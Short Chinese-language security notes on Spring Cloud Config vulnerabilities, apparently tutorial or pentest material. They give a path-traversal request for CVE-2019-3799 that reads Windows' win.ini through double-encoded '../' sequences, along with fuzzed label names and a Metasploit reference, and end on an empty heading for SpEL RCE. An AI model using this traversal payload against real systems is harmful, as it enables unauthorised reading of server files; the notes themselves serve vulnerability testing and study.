1.spring cloud config 跨目录文件读取(CVE-2019-3799):
参考:
测试环境下载:https://github.com/spring-cloud/spring-cloud-config/releases?after=v1.4.7.RELEASE
根据官方文档,可以通过如下请求GET /{name}/{profile}/{label}/{path} 来获取配置文件,name,profile和label的含义与常规环境下的endpoint相同,而path是指文件名。
http://127.0.0.1:8888/admin/env/master/..%252f..%252f..%252f..%252f..%252f..%252fWindows%252Fwin.ini
如果label不存在则会提示如下:
>No such label: env
或者:
Cannot load environment
fuzz出来lable:
test、master、head等
MSF测试:
参考https://www.xd10086.com/posts/1808713361549490810/
2、远程代码执行SpEL RCE